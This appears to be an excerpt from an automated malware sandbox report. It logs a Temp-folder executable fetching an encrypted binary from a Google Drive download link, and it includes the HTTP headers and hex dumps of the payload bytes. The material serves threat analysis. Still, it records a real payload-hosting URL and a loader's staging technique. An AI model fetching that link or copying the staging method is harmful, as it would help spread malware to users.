                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>


                  HTTPS Proxied Packets

                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.3 | 49758 | 142.250.203.110 | 443 | C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
                  Timestamp | kBytes transferred | Direction | Data
                  2021-12-02 06:09:36 UTC | 0 | OUT | GET /uc?export=download&id=1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: drive.google.com
                  Cache-Control: no-cache
                  2021-12-02 06:09:37 UTC | 0 | IN | HTTP/1.1 302 Moved Temporarily
                  Content-Type: text/html; charset=UTF-8
                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                  Pragma: no-cache
                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                  Date: Thu, 02 Dec 2021 06:09:37 GMT
                  Location: https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idfnisv3ndpp2nat5to25uprreq/1638425325000/03026244708369606156/*/1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB?e=download
                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                  Content-Security-Policy: script-src 'nonce-zNdzbYaATOnXTCHcQn8Bgg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                  X-Content-Type-Options: nosniff
                  X-Frame-Options: SAMEORIGIN
                  X-XSS-Protection: 1; mode=block
                  Server: GSE
                  Set-Cookie: NID=511=g8ZSW_ariF5l--_bR3j2pwy0y_BSkEROcyMHGJua46KVxShtS-q6Zi-XNi1VCOw6dK6D2rIvr5CsUDAfEkfVYpXzKO5XPad-NKAncKhy_oJC-SlotflCBaTF1wo9cL52e1JO08OC8vy4y-ck-oDCxl7qk4ObKNWOLAJHZ_ajeKo; expires=Fri, 03-Jun-2022 06:09:36 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                  Accept-Ranges: none
                  Vary: Accept-Encoding
                  Connection: close
                  Transfer-Encoding: chunked
                  2021-12-02 06:09:37 UTC | 1 | IN | Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn
                  2021-12-02 06:09:37 UTC | 2 | IN | Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.3 | 49760 | 142.250.180.161 | 443 | C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
                  Timestamp | kBytes transferred | Direction | Data
                  2021-12-02 06:09:37 UTC | 2 | OUT | GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idfnisv3ndpp2nat5to25uprreq/1638425325000/03026244708369606156/*/1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB?e=download HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Cache-Control: no-cache
                  Host: doc-00-50-docs.googleusercontent.com
                  Connection: Keep-Alive
                  2021-12-02 06:09:37 UTC | 2 | IN | HTTP/1.1 200 OK
                  X-GUploader-UploadID: ADPycdvp6KqCaxet_IK-_Iazk9XpF7okXgWy6s9QwMRMidZ0g8EEypAQh29XHm6qKYpJwkofEe_VwZbu9zvBocIVjAiEP_txUA
                  Access-Control-Allow-Origin: *
                  Access-Control-Allow-Credentials: false
                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, 
X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                  Access-Control-Allow-Methods: GET,OPTIONS
                  Content-Type: application/octet-stream
                  Content-Disposition: attachment;filename="Kelly_eweVqaYU208.bin";filename*=UTF-8''Kelly_eweVqaYU208.bin
                  Content-Length: 106560
                  Date: Thu, 02 Dec 2021 06:09:37 GMT
                  Expires: Thu, 02 Dec 2021 06:09:37 GMT
                  Cache-Control: private, max-age=0
                  X-Goog-Hash: crc32c=rA25Dg==
                  Server: UploadServer
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                  Connection: close
                  2021-12-02 06:09:37 UTC47INData Raw: 5d 89 45 ff e3 c5 99 a8 33 6a a3 45 79 6f 4a 17 0f be 66 a2 79 56 1e 46 61 5b 2b 45 ab ee e8 4e 7b 91 57 21 f6 72 fe a7 46 26 8e f5 49 6d 64 a3 94 77 5f c9 a0 5f 2d e3 84 4e ce 60 8e ed bf 63 fc b7 1d b4 bb eb b7 a7 d6 a5 65 33 1a 5a 0d d7 5a 8e 22 76 63 f3 e8 85 6f 8e 27 a8 8e 33 e5 26 1a 0b 98 05 6a 03 c5 51 e6 6c 1c fd e9 76 d3 e5 50 9f 0f 2c 95 4a a0 63 95 b5 b8 f8 e8 2e 9b 07 3b 61 b2 c4 f7 09 c9 e4 46 df a7 d1 d3 3a 2c 4b 53 b7 eb 0d 9a 0c 1a ca 22 06 24 d3 a3 22 b5 89 d6 8d 1d ac 77 fe 45 24 20 63 57 62 17 bf 9b 76 75 bd e1 16 6b 8a d1 8e 8e 08 11 96 b5 74 b3 b6 db 1a a8 cd ea 2f bb 3f 54 80 92 53 f9 70 6f 43 7b 52 85 9b d4 3b 5d b9 5b c5 a2 d2 c5 47 f9 30 fb c2 7a 74 8e f2 c2 7f 09 7d 93 fd 59 66 d9 a7 b1 8d e7 8e a3 1e df 9a 92 22 53 02 1e c4 36
                  Data Ascii: ]E3jEyoJfyVFa[+EN{W!rF&Imdw__-N`ce3ZZ"vco'3&jQlvP,Jc.;aF:,KS"$"wE$ cWbvukt/?TSpoC{R;][G0zt}Yf"S6
                  2021-12-02 06:09:37 UTC48INData Raw: 22 f5 75 e5 27 16 71 4f e6 6a f6 ef 14 1e da 5c b2 5b 2d 3d 04 13 4f 4b 04 17 b0 a9 58 d3 60 72 0b c9 84 f4 5e cd c7 b7 41 da c4 20 b5 a5 be 91 89 9b 63 bb af aa 5c cc 75 fa 4b c4 b0 b3 9b ce e2 5b 4b d6 64 0d cc 13 b1 1a 78 49 b4 01 b5 f3 87 06 e3 d6 bf 1d 5a eb 8c b9 48 df e8 9e 01 d1 5c ee 32 95 a5 77 a1 97 f3 60 a5 9e cc 0b 66 be 4e 91 b7 0b a1 86 4a 4f 5f 09 3f a8 b5 c5 9f 48 6a c2 1f 9d f4 de 6c 7b 43 2a 4e d3 70 a2 0f f0 17 02 b9 f2 42 e6 38 09 46 db bb db 9b 05 4b a3 38 5c 6e 83 8a 6a ee 6c 66 30 a5 ca 92 52 d0 ba 2a 06 eb 7a ce 74 63 e1 69 fd a6 5f 44 0d 06 5a 4f 5f 98 98 70 73 30 6e 12 6f d3 92 a2 be 97 69 ca d8 d1 e5 26 89 aa 0f 22 21 27 9f c2 83 64 74 a9 0e 81 25 15 ad 41 02 24 da 24 2d 86 be 67 9b c4 3f 30 b7 c0 91 81 39 97 ca 7d c9 26 98 3b
                  Data Ascii: "u'qOj\[-=OKX`r^A c\uK[KdxIZH\2w`fNJO_?Hjl{C*NpB8FK8\njlf0R*ztci_DZO_ps0noi&"!'dt%A$$-g?09}&;
                  2021-12-02 06:09:37 UTC49INData Raw: 9b 64 dd fe e0 90 dc ad 42 7c de 26 8d 22 0c 11 d1 a3 0b eb 44 01 fc 7d 0b 33 53 7e d3 73 cc 60 02 24 a8 ab c0 d3 01 42 19 a9 f2 23 a0 a2 21 9b 2e 69 84 65 b5 98 6c c6 fe 7d 28 e0 66 e0 5a 5b 0e 8f c0 4d c7 9c 9e 4c b2 d9 db e7 e6 29 5f 84 b9 04 8e 5e d6 62 fb d2 21 c0 86 93 b8 52 08 fe 06 57 f1 cf a7 32 a3 1c a7 ec cd 63 bf a6 6b 02 7f bf d0 09 49 42 c1 33 f7 16 47 82 ae 75 82 2f 3c 5d d7 03 b5 a5 eb 8a 1c df 25 96 54 e7 fd 5c a5 1b 46 c6 50 eb b4 c8 8a 80 2c a5 bc c8 1f e0 d8 74 6a a0 9a 43 ca 2c c9 29 27 96 80 3a e5 43 ea 0a 79 ad 52 0c ad 99 c6 8a b3 ae 4b 61 97 f9 0b 9d 91 c3 a4 48 50 46 7f 8d 94 8d 7a da c6 46 28 fc f1 0b d7 b9 46 bd 8d 93 50 e1 1a ab 83 a0 8b ee 02 73 b9 9c 2e 70 e5 a6 d0 81 74 92 36 03 19 1a e8 49 66 48 3a d3 80 60 f0 34 5c c8 92
                  Data Ascii: dB|&"D}3S~s`$B#!.iel}(fZ[ML)_^b!RW2ckIB3Gu/<]%T\FP,tjC,)':CyRKaHPFzF(FPs.pt6IfH:`4\
                  2021-12-02 06:09:37 UTC50INData Raw: c3 95 b5 26 61 38 14 9a 03 92 a9 34 03 6d ea 46 0f d6 92 ee 82 6e a8 a6 40 3e 4a 9f 3c 53 78 0a b6 27 74 93 78 4f 25 19 1b 93 24 24 01 92 be 58 f4 71 ca 5f 65 35 48 64 cb d3 cd 70 37 de 9a ff 5f 8e 7d ef 20 95 59 29 65 49 f7 81 6f 79 ee 8f f5 68 e3 9c 0d 8d f7 ca a3 20 be 06 e0 d3 e3 12 ff a1 1e ca 2b cc 09 dc 75 43 e0 aa 44 9e c3 b7 ee 16 e1 7e b5 46 01 4e 7d 03 3a dc 3c a2 29 ce 60 b1 24 b6 7a 8f 91 7c 14 1b a9 b7 a6 ba dd eb d9 57 3b 86 65 4a d1 e7 4f c6 3f ad af 64 e0 e4 19 b2 2f 4e 0f 46 d7 9c 4c c0 06 47 3f 30 6b d2 c3 bb 04 b0 a6 d5 d2 f5 90 a8 83 84 93 a6 10 cf 03 48 15 64 f0 a5 32 9c 83 0d e5 15 29 7f 9e 51 78 94 83 17 fd 35 95 01 7f 5a 16 cd 9c 66 ef 1a 59 5e 6e e3 89 9f 2f a9 df fd df 25 21 a4 99 c1 bf e7 4a 9b c6 50 1c 7b 30 c2 47 6e f8 65 c8
                  Data Ascii: &a84mFn@>J<Sx'txO%$$Xq_e5Hdp7_} Y)eIoyh +uCD~FN}:<)`$z|W;eJO?d/NFLG?0kHd2)Qx5ZfY^n/%!JP{0Gne
                  2021-12-02 06:09:37 UTC51INData Raw: ac b1 1e cc c4 ef a6 47 3c 8b ff 4c d1 d3 1c 06 4f da 1e 82 71 66 fd 04 e4 32 b5 11 e4 da c4 e7 61 c6 95 5d b6 75 32 ec ff 85 01 03 71 fa dc cc 50 87 d3 84 ec 27 b0 29 9b b5 13 c0 82 1d ad b1 18 ae a2 4c e7 4f 13 79 2e d8 e0 14 fe b2 bb e4 e7 59 d5 9e 77 22 0d 41 e1 22 f1 b8 d0 bb a1 9e 5b 2b 47 74 89 db b9 83 59 79 b5 9a 69 ad 00 af 60 29 33 e7 7d 40 6f 22 0b 71 d1 d2 f9 d5 3c 10 1b 61 8f 37 c3 39 92 67 bd b4 38 2a 8d ea 68 fb 12 95 4b 14 7b cb 4f 05 0f 2b 9e 55 9a b3 5d 9a 62 45 03 3c 86 af fc a5 55 89 9c 4e 84 40 1c a0 36 86 65 d3 d2 98 4c bf 5b bf 0f 8b a8 bb 27 aa d8 c9 06 d2 9e ca 72 68 a3 de db 10 26 ed 27 c8 d7 58 0b db d3 15 f9 1e e6 d6 0a 87 24 94 24 05 89 be 67 1d 6e 07 c4 c1 a2 2a 2d ae c2 0f 3d f8 8a 8f d4 43 8c f3 70 21 c2 3f 75 fb 3a 0b 80
                  Data Ascii: G<LOqf2a]u2qP')LOy.Yw"A"[+GtYyi`)3}@o"q<a79g8*hK{O+U]bE<UN@6eL['rh&'X$$gn*-=Cp!?u:
                  2021-12-02 06:09:37 UTC52INData Raw: 8d 64 b7 64 29 8c 24 2f 46 01 5a 21 55 93 7f 46 a9 8e 66 77 61 cd 0c 55 11 4f b7 2a bb 16 53 2c 5f 80 ef 36 ab af 7e f2 e2 f2 2d 8e e9 ce f7 50 9b 9c 61 9e b8 37 02 66 c3 c4 d7 b3 4d 54 15 21 08 9b d2 0f b2 3c f4 2e 29 ae cd 08 08 d4 83 ab c2 63 7c ff 70 43 cc 47 64 0a d9 29 10 5b b9 ec 47 5c 9c 3a 05 00 17 fd c2 e7 43 26 2c 2e fd 0c 47 0d 83 a5 66 d4 ae 1b f8 71 cb 9d a4 a8 6a a7 45 68 02 de ac c0 fa 2c 42 24 84 a1 b9 53 25 98 86 72 74 90 5d 76 2f a0 5a 07 b9 2d e0 2d e0 d3 1c da 15 a5 9c 32 c3 44 96 99 01 51 84 2b ea 61 14 f6 6a 3e 06 f2 1d ae a8 7f 68 88 11 1f eb 8b f7 f1 7e 09 d2 f1 f9 8f 80 3b 77 da a8 c3 2f 6e a0 d3 83 07 05 6b 38 c9 fa 9a 33 da da a6 10 b9 a6 62 a8 7c 92 7b 0c 93 6d 3b 9b eb 3a e0 c9 45 59 7b d0 a7 34 c3 9f b7 49 84 a3 78 04 e3 45
                  Data Ascii: dd)$/FZ!UFfwaUO*S,_6~-Pa7fMT!<.)c|pCGd)[G\:C&,.GfqjEh,B$S%rt]v/Z--2DQ+aj>h~;w/nk83b|{m;:EY{4IxE
                  2021-12-02 06:09:37 UTC54INData Raw: 09 34 3f d8 ed 3b 48 6a 94 8b 98 08 9c 29 cf bf 85 59 1d d0 9d 70 6e 19 83 ba 88 7d aa 3f 2c 56 64 61 ec 9f a3 e3 03 62 c4 d9 bb c8 a2 31 9f f2 f2 5d 9d 75 db fe 95 2e 72 ec a7 63 f3 9c 29 69 de a3 5f 44 f2 3a 3b 3a c8 42 bf 74 d5 90 55 fd 54 a0 aa d8 3b 32 a5 f5 21 82 6e c3 13 ec ba 52 32 5b 73 9b da b8 eb 46 a7 1c 53 af 01 92 ab 23 7b 28 80 9b 19 f2 fd 82 d1 5c 58 d4 38 92 9e 02 6f 9e b0 98 8b 9c 46 1c 6a 74 e9 f8 93 e0 7c 0d 0f 48 92 7a b7 db 42 01 f5 5e 32 87 80 af 95 0a 74 9f f0 54 7a c0 3b a1 2d 4a 36 1f 8f 53 04 ac 04 2d 18 e3 18 05 ab 70 36 fd ff c0 99 a7 d3 4a 6c bb 6a de be 96 0d ed d5 8b ae 7c 72 5b a4 f3 7b 2e 7f ce 92 8f 37 ab f9 ee 99 6c c6 17 f4 9f 74 74 19 4f 15 5e ce 08 c3 9d ce 47 78 64 17 f0 5b fa 60 c9 a5 86 28 7a a1 8f 7b 04 ab 13 0c
                  Data Ascii: 4?;Hj)Ypn}?,Vdab1]u.rc)i_D:;:BtUT;2!nR2[sFS#{(\X8oFjt|HzB^2tTz;-J6S-p6Jlj|r[{.7lttO^Gxd[`(z{
                  2021-12-02 06:09:37 UTC55INData Raw: ac 58 0f dc 96 02 d3 ab 12 57 04 4a 6d ea f4 e1 20 da ed 5d 71 af 9a 77 30 8e 0d 56 aa c1 d9 ea c0 56 82 17 5d e1 88 e4 4e da 9e 56 9f df ca b1 35 d8 c0 0b 88 94 c9 16 a3 79 d1 eb 60 94 5e ab 69 c9 ae 4b 97 e2 25 bc 6f 20 d2 10 b7 47 c5 3b 4a 61 20 ff 5c 3a 46 a2 78 07 58 73 87 8a 4d 98 8b 29 56 1a e8 7f 2f f1 6f 03 73 33 78 a4 bc 99 98 1c 79 61 ae 4c 75 aa 54 c8 e4 e2 4b b2 c4 80 1d 4f 81 31 0f ff 23 7e 7c 2b fd 3a 9b 19 9d 5e b1 76 36 9b b0 51 8d 38 57 cf fc f2 54 11 89 7f 9a 96 5f e9 ed 5e ca 4f a6 73 3a 61 3c c0 78 36 28 57 91 e9 d5 86 58 2d 1c 2a a0 14 8d 8e a0 74 d6 83 d8 eb 41 f6 f0 6d 2e c7 79 0f 62 81 d5 b2 0c 43 af 7e b3 62 19 1f f4 30 1e 43 fb 0f 11 51 f0 73 50 a7 4d 88 b8 31 56 8b dd 7d 18 e0 1b b0 22 57 78 ce dd 5d ef 6a 58 e1 95 54 50 df 1d
                  Data Ascii: XWJm ]qw0VV]NV5y`^iK%o G;Ja \:FxXsM)V/os3xyaLuTKO1#~|+:^v6Q8WT_^Os:a<x6(WX-*tAm.ybC~b0CQsPM1V}"Wx]jXTP
                  2021-12-02 06:09:37 UTC56INData Raw: ac 48 3f c3 fe af 21 27 11 d1 31 e3 5a 49 3b f4 3f 2a 30 67 96 5f 54 22 2a 74 19 68 9b 25 5b 19 ec 8d 26 6e 54 08 0c bb 7c 61 7a e8 c6 1e 8b 67 8c ea 29 09 b2 5a bb b6 6d c6 07 f4 47 80 7b 56 7e 82 43 c8 a4 77 c0 75 00 29 9f f2 6a 7f 2f 5d 2c 45 a5 a8 0c 76 05 64 db f5 08 98 ee df c1 49 11 b4 84 a4 6d c3 d6 a7 50 25 3f 35 f3 4f 5f 77 94 d1 f9 fd b2 39 1b 20 75 f3 0a 63 2a 55 7b 41 6a 76 b6 b7 a2 e2 4b 81 13 fd 76 29 75 94 5c c1 bd c9 26 29 c3 3a c8 e3 a0 81 17 cb aa f4 96 bf 13 11 ff ff 09 6e a8 8c 72 a9 51 30 49 ed c7 f5 a1 61 94 cc 92 e2 a1 9e b3 04 bb 57 40 da df 22 04 5a cb ca 9a 1a 98 d3 77 78 b1 e1 c9 c9 dc d9 87 c6 77 ec e5 b6 92 ba 63 45 17 21 90 c1 94 90 52 a4 dc 86 a5 dc 2b 58 ad 28 c1 15 4f 97 e3 74 ca ed c6 2a bd e3 98 92 6a 38 d3 cb 76 06 c2
                  Data Ascii: H?!'1ZI;?*0g_T"*th%[&nT|azg)ZmG{V~Cwu)j/],EvdImP%?5O_w9 uc*U{AjvKv)u\&):nrQ0IaW@"ZwxwcE!R+X(Ot*j8v
                  2021-12-02 06:09:37 UTC58INData Raw: 31 89 24 24 a9 23 86 e8 bc 75 aa c1 37 fb 13 5c 76 47 80 d7 22 4b aa 50 55 bc 73 41 8f 89 aa 1e 25 fd e1 a4 bc da 43 21 82 25 ad 18 97 fc 80 f0 0e 31 da c5 8c f9 ca 9d ef 01 bc 07 e6 b7 72 4d 7a dd 8e bd 0e c3 99 d9 5a d6 24 d4 0d 39 1e 04 10 12 1d 38 ae 46 dd cf 53 c0 70 89 fe f2 4f 9e 3b cc bc 8e 0c bc 08 09 75 0a 66 59 c2 33 d6 6a 96 ed f8 f4 3b 4f 2c d4 fe 88 29 e6 e9 d0 e4 6e 5a 9c 0c a0 3a 6b b8 67 5a c2 ec 39 5c 1b 98 6f 0c 89 39 45 0c 5a 5f 53 13 0b aa 05 dc 51 2d df f2 ff 17 f4 f3 d8 67 e5 d0 e8 5e 13 0f 3a a2 6e 65 dd 23 e7 03 cb 04 32 f2 99 bf e5 f3 f3 d2 4d 74 3a 3b 77 22 ff b0 aa 5f e8 b3 4e ea 56 18 bc 8c ab c1 1f 0b 5c d8 42 6c e6 cb 31 2b 53 c2 83 6e 1c 48 39 cd 4d 93 7b e1 12 28 15 b8 8c 34 0e 6c 61 4d 6f e3 3b 54 3a 1f ab ed a1 f7 24 59
                  Data Ascii: 1$$#u7\vG"KPUsA%C!%1rMzZ$98FSpO;ufY3j;O,)nZ:kgZ9\o9EZ_SQ-g^:ne#2Mt:;w"_NV\Bl1+SnH9M{(4laMo;T:$Y
                  2021-12-02 06:09:37 UTC59INData Raw: 95 86 e2 d5 fd 70 b8 9b 74 62 87 c3 e8 f7 79 88 35 b9 ef 4b 9e ec 32 62 05 39 08 ef 02 1c 97 cb 95 5c 41 b0 ef 6a 2f 75 c5 c8 0d 0b 13 97 9b 14 e3 c4 32 ad 92 d3 2a f5 d4 ab 63 b3 f1 83 ed b9 9f 86 a2 c4 ef 4d f4 28 70 a1 c9 e5 6c 8b a9 44 1a 67 77 2d cf cb 5f 11 a8 15 a9 02 eb b7 57 9e 71 e8 ff 47 96 1c 61 cf b6 58 5d 62 81 52 51 8e bf 6b 6f 8b c7 91 9c 25 d2 00 38 4c 3b bf 93 1f 6c d6 e0 60 2f 9b a9 25 db 73 a5 95 38 8a 23 b3 73 6a b7 24 45 9d c7 4b 51 98 74 8d 42 5a 1b d3 57 28 44 63 02 9c 67 53 01 14 6c be 93 a9 f2 24 7e 91 46 5c c1 c4 2a 65 7f 0c 95 c7 01 52 ec 27 64 e0 cf 92 11 63 df 75 77 bc 9a fa 4d bc 77 00 08 11 89 d4 91 9e 8e a1 81 b9 fd 70 5b 83 2d 84 8e 72 7c ff 70 e5 88 e7 9b a8 a3 ae 6c 60 76 1b 3b 62 96 7d ea 0f b3 68 50 dd 2e 9a 53 83 96
                  Data Ascii: ptby5K2b9\Aj/u2*cM(plDgw-_WqGaX]bRQko%8L;l`/%s8#sj$EKQtBZW(DcgSl$~F\*eR'dcuwMwp[-r|pl`v;b}hP.S
                  2021-12-02 06:09:37 UTC60INData Raw: d1 e2 6e 85 02 34 6d 81 7b 32 c1 11 44 84 0a e5 21 df 2f 79 e7 09 18 31 84 6c c6 f9 f0 f8 d6 90 a4 7d c9 d5 9c b5 94 23 8a b4 9f 86 b7 94 e6 e2 e5 c2 13 49 4d f8 00 4a 68 88 11 79 54 b1 d7 9c bc 4d b2 d0 5f cc 1b 90 43 eb e6 47 35 b3 03 e8 8c f1 34 61 ac b5 6f ee ba 42 71 fd 6d a9 e6 82 1d ad b1 29 77 0f 0f 05 f5 5c 41 5c 38 ec e0 15 b0 cc 1d 81 d0 d1 9b 4f 88 f6 11 b1 f7 65 5c 29 8a 05 ea d6 56 ed 60 02 ba b3 5f f2 79 b5 cb c5 2b 64 05 15 21 0e c4 f3 44 45 55 ac 73 b5 e2 d2 ac d7 12 ca e8 d7 5d df a0 cb 48 33 86 52 1d d8 95 7b 83 38 90 dd 8d 9a de b4 1c 65 ca 73 1a dc 27 05 a1 af cf 3f 3a b7 70 51 68 5c ff 2e aa 8a a0 10 3a e2 67 00 8f b8 ab 7b c9 ce 12 97 6c 3b 34 b9 2d 79 08 01 c9 5f 0d bf 6c 63 ec 77 85 fc b8 51 da 2d 83 52 d5 a5 af d6 82 80 96 ac 48
                  Data Ascii: n4m{2D!/y1l}#IMJhyTM_CG54aoBqm)w\A\8Oe\)V`_y+d!DEUs]H3R{8es'?:pQh\.:g{l;4-y_lcwQ-RH
                  2021-12-02 06:09:37 UTC61INData Raw: 17 36 d5 56 2c 0e f4 68 74 29 90 c3 e8 f2 15 4f b8 11 26 f2 1c 8b 1a 03 63 22 5c 76 0a 5e 2f 3f b0 4b dd 04 7c 48 ee e2 8c 0c 2a 46 01 80 b6 a1 b9 5e 4d d3 28 45 cc aa 41 bb d8 b7 eb dd 6f 24 22 45 94 61 8e 46 5d fc 3a 4c 9e b0 d1 6c 66 81 d7 52 af c8 75 a4 c4 84 57 8d 70 0b 28 8b c2 20 ab b9 24 7c b3 26 56 45 a8 8e 6b d2 ab 7b 15 4c 23 16 93 b8 e8 f6 f8 70 e5 80 f0 6f c9 a6 18 ef 4c 78 c8 c5 9d 15 39 bc 97 eb 89 60 79 13 13 e0 b2 47 73 f7 82 e6 fd 5e 6e 79 14 94 39 91 a5 1e 55 2e 36 7d 7c 3a 64 a3 0b ab 66 9c 23 9f 71 99 cc 4c 20 82 62 6b 37 98 97 b2 31 48 f7 df d0 36 ca cf cc eb 02 9f c9 01 ac 38 fc a9 d8 dd fd 47 94 07 51 39 15 33 0a e6 30 15 43 5b b7 af 4d 30 f0 3a 2c 5a 88 4c 53 97 88 ae 3d af 4e a2 b2 8f 06 ae c1 e4 6b bb e7 83 5f 5b da 16 7c 44 e8
                  Data Ascii: 6V,ht)O&c"\v^/?K|H*F^M(EAo$"EaF]:LlfRuWp( $|&VEk{L#poLx9`yGs^ny9U.6}|:df#qL bk71H68GQ930C[M0:,ZLS=Nk_[|D
                  2021-12-02 06:09:37 UTC63INData Raw: 51 97 b7 35 34 13 e8 dd 0c 61 a7 11 9e 47 59 fe a1 50 76 13 5a 45 bb 7c 6f 35 02 8e cd 84 b2 6d e9 34 69 15 a7 18 71 79 9b 80 1c 88 fc 35 f1 45 16 44 33 2d e6 73 bc 0f 70 c8 11 02 56 88 7d aa 0d 16 be 76 3f 44 9f cf fc 11 5a 9b ce 2e 67 59 ea f9 99 d9 5c 34 e8 69 aa 5f 99 03 5d fe d2 2e 0b d9 13 43 5d ca ba 5e b0 e2 9a 62 54 40 63 c4 a7 f9 ea ec 17 65 71 8a 85 c0 ca 9e 8a 0d c5 18 d0 10 8e 36 05 c9 78 4f 6d c6 d0 02 af 8c 15 1a 49 05 52 46 92 05 22 01 c6 1f 3e e6 f3 6b d6 91 2b 95 3e 86 8d 31 8a 31 2c ec 1f f3 02 af d6 42 cf f8 e6 fe 0f 35 ca d7 ce db 77 3b 74 33 b4 6b 12 68 71 d7 ad 96 8e d7 f3 32 9e 82 90 1a 1c 5c c7 6e 17 47 dd c5 2e fa 3f cf a6 42 6a 65 3f cb db b3 f3 25 76 8d d5 e9 a1 5d 3d 79 ef 52 d8 2f cb 19 58 f9 52 6c 05 05 c9 27 fa c5 4a 81 ee
                  Data Ascii: Q54aGYPvZE|o5m4iqy5ED3-spV}v?DZ.gY\4i_].C]^bT@ceq6xOmIRF">k+>11,B5w;t3khq2\nG.?Bje?%v]=yR/XRl'J
